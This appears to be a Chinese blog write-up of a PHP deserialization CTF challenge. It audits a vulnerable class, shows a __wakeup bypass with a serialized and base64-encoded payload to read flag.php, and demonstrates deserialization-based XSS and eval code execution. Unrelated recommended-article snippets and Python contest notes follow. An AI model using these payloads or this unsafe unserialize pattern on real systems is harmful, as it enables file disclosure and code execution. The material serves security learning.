PHP反序列化CTF例题

最新推荐文章于 2025-05-22 00:20:17 发布
原创 最新推荐文章于 2025-05-22 00:20:17 发布 · 6.3k 阅读 · 15 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#web安全

渗透学习

不安全的反序列化之PHP反序列化

文章目录

前言

本系列用于记录本人渗透学习的过程,主要内容围绕Owasp TOP 10展开。

接上篇不安全的反序列化之反序列化基础用简单案例接触了PHP反序列化,但对该漏洞的利用和实际场景浅尝辄止 。这篇将会用代码审计的方式分析一道典型的存在PHP反序列化漏洞的案例,加深对魔术方法等相关知识的理解。另外,还会和xss跨站脚本的知识进行融合。

本文只做学习用途,严禁利用本文提到的技术进行非法攻击,否则后果自负,本人不承担任何责任。

一、CTF例题

学习案例

class SoFun{ 
    protected $file='index.php';
    function __destruct(){ 
      if(!empty($this->file)) {
       if(strchr($this-> file,"\\")===false &&  strchr($this->file, '/')===false)
          show_source(dirname (__FILE__).'/'.$this ->file);
       else      die('Wrong filename.');
      }}  
    function __wakeup(){ $this-> file='index.php'; } 
    public function __toString(){return '' ;}}     
    if (!isset($_GET['file'])){ show_source('index.php'); } 
    else{ 
       $file=base64_decode( $_GET['file']); 
       echo unserialize($file ); } 
?>   #<!--key in flag.php-->

代码审计:
根据提示,key在flag.php中,而想要获得文件中内容,只能靠语句show_source(dirname (__FILE__).'/'.$this ->file);
发现该题用到了__destruct等魔术方法,可以根据其性质进行漏洞利用(详见上一篇文章)
常规思路是利用反序列化的方式POST"file"参数将读取的文件从index.php替换成flag.php,然后利用__destruct的自动执行读取flag.php中的内容。
但是在反序列化执行时会自动执行__wakeup,其作用是将文件再设为index.php
解决方案:
显然我们需要利用一种方法绕过__wakeup方法,而当序列化字符串中,表示对象属性个数的值大于实际属性个数时,那么就会跳过wakeup方法的执行。比如:
实际情况:O:7:”Student”:1:{S:4:”name”;s:8:”zhangsan”;}
Payload:O:7:”Student”:2:{S:4:”name”;s:8:”zhangsan”;}
Payload对象属性个数为2,而实际属性个数为1,那么就会掉入漏洞,从而跳过wakeup()方法。
Payload
根据上篇文章所学,易得反序列化语句为O:5:”SoFun”:2:{S:7:”\00*\00file”;s:8:”flag.php”;}
值得注意的是,file是protected属性,因此需要用\00*\00来表示,\00代表ascii为0的值。
此题还需要一次Base64编码,结果为:
Tzo1OiJTb0Z1biI6Mjp7Uzo3OiJcMDAqXDAwZmlsZSI7czo4OiJmbGFnLnBocCI7fQ==
在这里插入图片描述
该PHP反序列化漏洞的案例其实来源于16年SugarCRM v6.5.23中
SugarCRM(http://www.sugarcrm.com/ )是一套开源的客户关系管理系统。研究者发现在其<=6.5.23的版本中存在反序列化漏洞,程序对攻击者恶意构造的序列化数据进行了反序列化的处理,从而使攻击者可以在未授权状态下执行任意代码。
有兴趣的可以点击了解

二、PHP反序列化漏洞和XSS跨站脚本

当尝试序列化一段xss代码的时候,当它进行反序列化的时候会自动执行xss

<?php
    $a="test"; //字符串
    $arr = array('j' => 'jack' ,'r' => 'rose'); //数组
    class A{
        public $test="<img src=1 οnerrοr=alert(1)>";
    }
    echo "序列化:";
    echo "</br>";
    $aa=serialize($a);
    print_r($aa);
    echo "</br>";
    $arr_a=serialize($arr);
    print_r($arr_a);
    echo "</br>";
    $class1 = new A(); //对象
    $class_a=serialize($class1);
    print_r($class_a);
    echo "<br/>";
    echo "反序列化:";
    echo "<br/>";
    print_r(unserialize($aa));
    echo "</br>";
    print_r(unserialize($arr_a));
    echo "</br>";
    print_r(unserialize($class_a));
?>

执行结果:
在这里插入图片描述
在__wakeup中一样存在类似的漏洞:

<?php
class A{
    var $test = "demo";
    function __wakeup(){
            echo $this->test;
    }
}
$a = $_GET['test'];
$a_unser = unserialize($a);
?>

使用payload:O:1:"A":1:{s:4:"test";s:28:"<img src=1 onerror=alert(1)>";}一样会造成XSS攻击

而如果__wakeup中不是echo $this->test; ,是eval(*)那么就是任意代码执行则会造成更严重的后果。
比如:

<?php
class A{
    var $test = "demo";
    function __wakeup(){
           eval($this->test);
    }
}
$b = new A();
$c = serialize($b);
echo $c;
$a = $_GET['test'];
$a_unser = unserialize($a);
?>

构造payload:O:1:"A":1:{s:4:"test";s:10:"phpinfo();";}即可获得php内置信息

总结

以上介绍了一道比较综合的CTF题目对PHP反序列化漏洞有一个更清晰化的认识,这道题难度不算高,但对代码审计能力有着一定的要求。

【网络安全 | CTF】记一次PHP序列化反序列化解题详析
等风来
08-24 5817
代码开门见山给出backdoor函数,而该函数在popko类的call方法中调用故需要运行call方法而call方法是在对象上下文中调用不可访问的方法时触发的故需要调用不可访问的方法 而恰巧destruct方法中并不存在a对象和a函数故需要运行destruct方法而destruct方法在对象被销毁时触发 如何实现对象被销毁呢? 当序列化后的语句被反序列化之后,对象会被销毁,从而触发destruct方法 所以思路就是: 在pipimi类中构造一个对象,当pipimi中的destru
php反序列化1_常见php序列化的CTF考题
书山有路勤为径,学海无涯苦作舟
11-25 1859
本质上serialize()和unserialize()在php内部的实现上是没有漏洞的,漏洞的主要产生是由于应用程序在处理对象,魔术函数以及序列化相关问题时导致的。当传给unserialize()的参数可控时,那么用户就可以注入精心构造的payload当进行反序列化的时候就有可能会触发对象中的一些魔术方法,造成意想不到的危害。__toString() 是魔术方法的一种,具体用途是当一个对象被当作字符串对待的时候,会触发这个魔术方法以下说明摘自PHP官方手册。
从一道CTF题学习PHP反序列化漏洞-附件资源
03-02
从一道CTF题学习PHP反序列化漏洞-附件资源
CTF 解题报告:simple_php
最新发布
井底之蛙见世界
05-22 464
本次CTF挑战聚焦于PHP代码的安全审计,目标是通过构造特定的URL参数绕过代码中的条件判断,获取隐藏的flag。提供的PHP代码片段包含三个关键条件判断:第一个条件要求$a等于0且$a为真,逻辑上相互矛盾;第二个条件检查$b是否为数字;第三个条件要求$b大于1234。通过分析,发现可以利用PHP的松散类型比较和隐式类型转换特性,构造合适的参数绕过这些条件。具体Payload为a=Nan和b=1235abc,使得$a==0成立但$a为假,同时$b为非数字且数字前缀大于1234,从而触发flag逻辑。最终,通
反序列化学习笔记【一文打通ctf中的反序列化题目
jayq1的博客
07-21 8768
本文包含反序列化的各类题目,比如基础的php反序列化 反序列化字符逃逸 phar反序列化 Pickle反序列化 师傅们轻点喷~
原理+实践掌握(PHP反序列化和Session反序列化)
bylfsj的博客
03-22 1858
<p></p><h2 id="toc-0">前言:</h2> 最近又接触了几道php反序列化题目,觉得对反序列化的理解又加深了一点,这次就在之前的学习的基础上进行补充。 0x00:PHP序列化 函数 : serialize() 所有php里面的值都可以使用函数serialize()来返回一个包含字节流的字符串来表...
php 反序列化 ctf,CTF-Web-PHP反序列化
weixin_31940835的博客
03-27 541
概念解释PHP 反序列化漏洞又叫做 PHP 对象注入漏洞,我觉得这个表达很不直白,也不能说明根本的问题,不如我们叫他 PHP 对象的属性篡改漏洞好了(别说这是我说的~~)反序列化漏洞的成因在于代码中的 unserialize() 接收的参数可控,从上面的例子看,这个函数的参数是一个序列化的对象,而序列化的对象只含有对象的属性,那我们就要利用对对象属性的篡改实现最终的攻击。魔法方法construct...
ctf+php反序列化,CTF中的PHP反序列化漏洞简单分析
weixin_39965881的博客
04-02 1942
本帖最后由 icq_8bf67fe65 于 2018-9-2 21:20 编辑本文原创作者:Versi0n,本文属i春秋原创奖励计划,未经许可禁止转载!一、前言在ctf比赛中,经常会遇到php反序列化漏洞的题,今天就来简单分析下该漏洞的正确食用姿势~二、正文1.基础知识PHP序列化:php为了方便进行数据的传输,允许把复杂的数据结构,压缩到一个字符串中,使用serialize()函数。PHP反序列...
CTF中的反序列化题目
weixin_50372036的博客
06-25 1034
其次是wakeup,wakeup只需要把序列化字串的对象属性个数1改为别的数字就行了,但是注意这里file 的类型是private,所以打印出来的串是有不可见字符%00的,不要复制出来自己base,不然结果就不一样了。方法有一个CVE漏洞,CVE-2016-7124,在传入的序列化字符串在反序列化对象时与真实存在的参数个数不同时会跳过执行,即当前函数中只有一个参数$flag,若传入的序列化字符串中的参数个数为2即可绕过。传入s中,就得到了执行phpinfo后的界面,完成了执行流程的改变。
CTF题型 Python中pickle反序列化进阶利用&amp;例题&amp;opache绕过
2401_84557136的博客
05-02 1174
🍅 硬核资料:关注即可领取PPT模板、简历模板、行业经典书籍PDF。🍅 技术互助:技术群大佬指点迷津,你的问题可能不是问题,求资源在群里喊一声。🍅 面试题库:由技术群里的小伙伴们共同投稿,热乎的大厂面试真题,持续更新中。🍅 知识体系:含编程语言、算法、大数据生态圈组件(Mysql、Hive、Spark、Flink)、数据仓库、Python、前端等等。网上学习资料一大堆,但如果学到的知识不成体系,遇到问题时只是浅尝辄止,不再深入研究,那么很难做到真正的技术提升。
php反序列化漏洞典型例题
m0_62284238的博客
10-28 1107
ctfhub-技能树-pklovecloud引用题目:2021-第五空间智能安全大赛-Web-pklovecloud。
CTF_Web反序列化学习笔记(二)CTF经典考题由浅至深
AFCC_的博客(Web_Dog)
08-16 8914
0x00 CTF中的反序列化题目 这类题目中主要是利用反序列化各种魔术方法的绕过或调用,从而构造符合条件的序列化字符串,完成特定的功能,在这一点上对于整个代码段的执行流程要很清楚。我们先从最简单的开始看起。 0x01 攻防世界unserialize3 题目显示的源码为: class xctf{ public $flag = '111'; public function __wakeup(){ exit('bad requests'); } ?code= 在这里我们可以看到只有一个魔术方法,而__w
CTF-php反序列化 (下)
2301_81556781的博客
09-15 1180
这个地方,正常逻辑是3只有一个字符,但是却被标注为28个,那么在反序列化的时候,就会出现报错,但是此题在反序列化之前会对msg的参数进行替换操作,会将4个字符的fuck替换5个关字符的loveu,这样的话本来缺少的27个字符,就会被经过增加替换而多出来的27个字符顶替,正好满足136=109(love)+27(u),而后面的27个字符也就顺理成章的替换了后面的token。"成功":"失败")."----".date_create()->format('Y-m-d H:i:s'));
CTF php反序化简单的入门题目 (对初学者非常友好,单一考点)
AAAAAAAAAAAA66的博客
12-28 2427
地址 :要注册的 http://www.whalwl.site:8026/ 题目非常明了,只有一个类site 和一个魔法函数_destruct unserialize(反序化前自动调用_destruct) 关键 在$a($this->title) 明显的是a参数执行(this->title) 所以在这里可以构造命令执行,利用assert函数执行system系统命令。 构造payload <?php class site{ public $url...
PHP反序列化【原理+CTF实战】
2301_80127209的博客
04-19 1498
申明:本账号所分享内容仅用于网络安全技术讨论,切勿用于违法途径,所有渗透都需获取授权,违者后果自行承担,与本号及作者无关,请谨记守法。序列化的目的是方便数据的传输和存储,在PHP中,序列化和反序列化一般用做缓存,比如session缓存,cookie等.进行绕过,(在赛后我把题给Ssh1y写了,他的利用方式是nc反弹个shell,属实是开拓了我的眼界)。环境搭建、HTML,PHP,MySQL基础学习,信息收集,SQL注入,XSS,CSRF,暴力破解等等。”,这显然就无法继续利用了。编码后在前部加7个1。
PHP反序列化题目记录
BaiScorpio的博客
06-20 991
最近跑去看了下PHP反序列化,发现比起java容易理解多了,主要是一些魔法函数相关反序列化、字符逃逸的反序列化、session反序列化、POP链反序列化和PHAR反序列化,以下将记录学习过程中的一些例题学习的过程。...
PHP反序列化学习笔记(CTF
就是我的博客
08-26 1701
ctfphp反序列化学习
php ctf题,CTF---PHP安全考题
weixin_28736145的博客
03-26 799
1.弱类型比较php中有两种比较的符号 == 与 ===1
PHP反序列化--简单ctf题--pop链(thinkphp5.1.X)漏洞复现
cainiao17441898的博客
07-07 4919
前言: PHP 将所有以 __(两个下划线)开头的类方法保留为魔术方法,这些都是PHP内置的方法。 __construct 当一个对象创建时被调用 __destruct 当一个对象销毁时被调用 __wakeup() 使用unserialize时触发 __sleep() 使用serialize时触发 __call() 在对象上下文中调用不可访问的方法时触发 __callStatic() 在静态上下文中调用不可访问的方法时触发 __get() 用于从不可访问的属性读取数据 __set() 用于将数据写入不可访
Python蓝桥杯笔记
05-07
### Python 蓝桥杯 学习笔记 教程 #### 1. 必备基础知识 对于参加蓝桥杯竞赛的学生来说,掌握一些特定的知识点是非常重要的。例如,在Python版本的选择方面,如果使用的是3.9.0及以上版本,则可以直接利用`lcm`函数来计算最小公倍数[^1]。此外,`gcd`函数也得到了更新,支持通过传递多个参数的形式求解最大公约数。 #### 2. 基础练习题目分类 蓝桥杯的基础练习部分涵盖了多种类型的编程问题,这些问题可以帮助参赛者熟悉基本的数据结构和算法概念。以下是几个典型的例子: - **A+B问题 (BASIC-01)**:这是入门级的加法操作。 - **序列求和 (BASIC-02)**:涉及简单的数学公式应用。 - **圆的面积 (BASIC-03)**:实数输出的应用实例。 - **Fibonacci数列 (BASIC-04)**:数列生成以及取模运算的学习案例[^2]。 #### 3. 文件读取与处理技巧 某些题目可能涉及到文件的操作,比如从文本文件中读取数据并进行相应的处理。下面是一个简单示例展示如何逐行读取文件内容并将每行去掉换行符后存入列表: ```python lines = [] with open('example.txt', 'r') as f: for line in f.readlines(): lines.append(line.strip('\n')) ``` 这段代码展示了如何打开名为`example.txt`的文件,并将其每一行的内容去除末尾的换行符后再存储到列表`lines`当中[^4]。 #### 4. 矩阵乘法实现 矩阵运算是计算机科学中的一个重要主题,尤其是在解决线性代数相关的问题时尤为常见。这里给出了一种基于Python实现的矩阵相乘方法,该方法能够接受两个相同维度的方阵作为输入,并返回它们相乘后的结果矩阵。 ```python import copy def Matrix_Mul(N, M, a): if M == 0: for i in range(0, N): for j in range(0, N): if i == j: print(1, end=' ') else: print(0, end=' ') print('') exit(0) elif M == 1: for i in range(0, N): for j in range(0, N): print(a[i][j], end=' ') print('') else: b = copy.deepcopy(a) c = copy.deepcopy(a) sum_ab = 0 count = 0 while count < M - 1: for i in range(0, N): for j in range(0, N): for k in range(0, N): sum_ab += b[i][k] * a[k][j] c[i][j] = sum_ab sum_ab = 0 if count == M - 2: for i in range(0, N): for j in range(0, N): print(c[i][j], end=' ') print('') count += 1 b = copy.deepcopy(c) N, M = map(int, input().split()) a = [] for i in range(1, N + 1): a.append(list(map(int, input().split()))) Matrix_Mul(N, M, a) ``` 此段程序定义了一个用于执行矩阵幂运算的功能模块 `Matrix_Mul`,它接收三个参数分别是阶次、幂次以及初始矩阵本身[^5]。 ---
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

bwxzdjn

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值